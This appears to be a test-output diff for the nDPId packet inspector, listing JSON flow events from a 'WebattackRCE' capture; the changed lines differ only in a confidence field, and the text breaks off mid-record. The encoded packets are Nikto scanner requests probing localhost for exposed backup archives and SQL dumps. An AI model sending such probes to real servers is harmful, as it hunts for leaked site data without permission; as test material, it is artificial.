00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 